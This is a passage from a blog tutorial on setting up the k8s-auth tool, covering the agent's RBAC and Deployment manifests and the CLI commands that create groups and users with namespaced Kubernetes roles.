&lt;p&gt;Let’s create the clusterole and the binding!&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;create cluster role&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;rbac.authorization.k8s.io/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ClusterRole&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;creationTimestamp:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;null&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;rules:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;apiGroups:&lt;/span&gt; [&lt;span class=&#34;string&#34;&gt;&amp;quot;*&amp;quot;&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt; [&lt;span class=&#34;string&#34;&gt;&amp;quot;*&amp;quot;&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;verbs:&lt;/span&gt; [&lt;span class=&#34;string&#34;&gt;&amp;quot;*&amp;quot;&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;meta&#34;&gt;---&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;rbac.authorization.k8s.io/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ClusterRoleBinding&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;creationTimestamp:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;null&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;roleRef:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;apiGroup:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;rbac.authorization.k8s.io&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ClusterRole&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;subjects:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ServiceAccount&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;namespace:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now it’s time to the last part! we will deploy the agent itself! The agent need to know some information so as expected there is some environement variable!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;CLUSTER_NAME&lt;/code&gt; : is the same name that you put it inside the authentication server&lt;/li&gt;
&lt;li&gt;&lt;code&gt;TOKEN&lt;/code&gt; : The generated token from the authentication server&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SERVER&lt;/code&gt; : The authentication server itself&lt;/li&gt;
&lt;li&gt;&lt;code&gt;API_SERVER&lt;/code&gt; : This is contains the public hostname for the API SERVER. The agent can detect it correctly when you have a cluster inside Network and the cluster is not exposed in the internet&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;I used kubeadm clusters in provisionning clusters. I didn’t find a way to find the public hostname! So you need to indicate the api server until it will be fixed!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;deploy&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;22&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;24&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;25&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;26&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;27&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;28&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;29&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;30&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;31&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;32&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;33&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;34&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;35&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;36&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;apps/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Deployment&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;creationTimestamp:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;null&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;namespace:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;replicas:&lt;/span&gt; &lt;span class=&#34;number&#34;&gt;1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;selector:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;matchLabels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;strategy:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;template:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;creationTimestamp:&lt;/span&gt; &lt;span class=&#34;literal&#34;&gt;null&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;labels:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;app:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;    &lt;span class=&#34;attr&#34;&gt;spec:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;serviceAccountName:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;attr&#34;&gt;containers:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;      &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;image:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;mohamedrafraf/k8s-auth-kube&lt;/span&gt; &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;k8s-auth-kube&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;env:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;CLUSTER_NAME&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;value:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;ctf-cluster&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;TOKEN&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;value:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;Z8taw1yFw4lsq7cgSvmZ&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;SERVER&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;value:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;&amp;quot;https://auth.4n6nk8s.tech&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;API_SERVER&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;value:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;https://172.190.91.84:6443&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;status:&lt;/span&gt; &amp;#123;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;After deploying the agent. you can check the clusters with the cli again and you’ll find everything is ok!&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/MqHeeY1.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;The cluster is on Active status and the api server is not empty now! You can repeat this operation with many clusters and this is how multi-clusters can work together!&lt;/p&gt;
&lt;h2 id=&#34;create-users-and-groups&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#create-users-and-groups&#34;&gt;#&lt;/a&gt; Create Users and Groups&lt;/h2&gt;
&lt;p&gt;The cluster is now ready for authentication and has been verified to be functioning without any issues. The connection between the cluster and authentication has been established. Now, let’s proceed to creating groups and users.&lt;/p&gt;
&lt;p&gt;Let’s see what  &lt;code&gt;k8s-auth create&lt;/code&gt;  can do for us!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;2023-04-29-15-56-38.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Great news! With the  &lt;code&gt;k8s-auth create&lt;/code&gt;  command, you can easily create groups and users for your authenticated clusters. To create a group, simply specify the cluster and provide a YAML manifest file containing the roles for that group. For creating a user, you can either assign them to an existing group or provide a YAML manifest file for the user’s roles if they do not belong to any group.&lt;/p&gt;
&lt;p&gt;Let’s define the role for our group that we will create!&lt;/p&gt;
&lt;figure class=&#34;highlight yaml&#34;&gt;&lt;figcaption&gt;&lt;span&gt;group rule&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Role&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;rbac.authorization.k8s.io/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;namespace:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;dev&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;pod-and-secret&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;rules:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;apiGroups:&lt;/span&gt; [&lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;quot;&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt; [&lt;span class=&#34;string&#34;&gt;&amp;quot;pods&amp;quot;&lt;/span&gt;,&lt;span class=&#34;string&#34;&gt;&amp;quot;secrets&amp;quot;&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;verbs:&lt;/span&gt; [&lt;span class=&#34;string&#34;&gt;&amp;quot;list&amp;quot;&lt;/span&gt;,&lt;span class=&#34;string&#34;&gt;&amp;quot;create&amp;quot;&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;meta&#34;&gt;---&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;kind:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;Role&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;apiVersion:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;rbac.authorization.k8s.io/v1&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;metadata:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;namespace:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;prod&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;pod-list&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;attr&#34;&gt;rules:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;apiGroups:&lt;/span&gt; [&lt;span class=&#34;string&#34;&gt;&amp;quot;&amp;quot;&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;resources:&lt;/span&gt; [&lt;span class=&#34;string&#34;&gt;&amp;quot;pods&amp;quot;&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  &lt;span class=&#34;attr&#34;&gt;verbs:&lt;/span&gt; [&lt;span class=&#34;string&#34;&gt;&amp;quot;list&amp;quot;&lt;/span&gt;]&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;The group we’re about to create will be granted permission to create and list pods and secrets in the “dev” namespace, while they will only be able to list pods in the “prod” namespace.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Any user will be belong to this group will have these permissions! You don’t have to repeat the same manifest for each user!. This is why groups exists!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This command will create the group for you&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;k8s-auth create group &amp;lt;name&amp;gt; --cluster=&amp;lt;cluster&amp;gt; --file=&amp;lt;rbac_file&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/g5YBB8u.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;As you can see here! The group is create successfully and you can see his permission when you forget it using  &lt;code&gt;k8s-auth get permission&lt;/code&gt;  command!&lt;/p&gt;
&lt;p&gt;You can discover what you can do with  &lt;code&gt;k8s-auth get&lt;/code&gt;  command!! You can a list users too!&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/MOC7L1o.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Now let’s create a user that belong to this group! So we don’t need to specify any manifest file that define roles!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;user&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;k8s-auth create user --name &amp;lt;name&amp;gt; --fullname &amp;lt;value&amp;gt; --mail &amp;lt;mail&amp;gt; --cluster &amp;lt;cluster&amp;gt; --group &amp;lt;group&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;In case that you want to create a user that don’t belongs to any group and have his own permission you can delete the  &lt;code&gt;--group&lt;/code&gt;  and change it with  &lt;code&gt;--file&lt;/code&gt;  and specify the yaml file that contains his roles!&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;No need to worry about naming roles because there won’t be any overlapping between them. The agent takes care of creating roles and bindings in the background, and the names you specify in the manifest won’t be used directly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/n2S8BQM.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
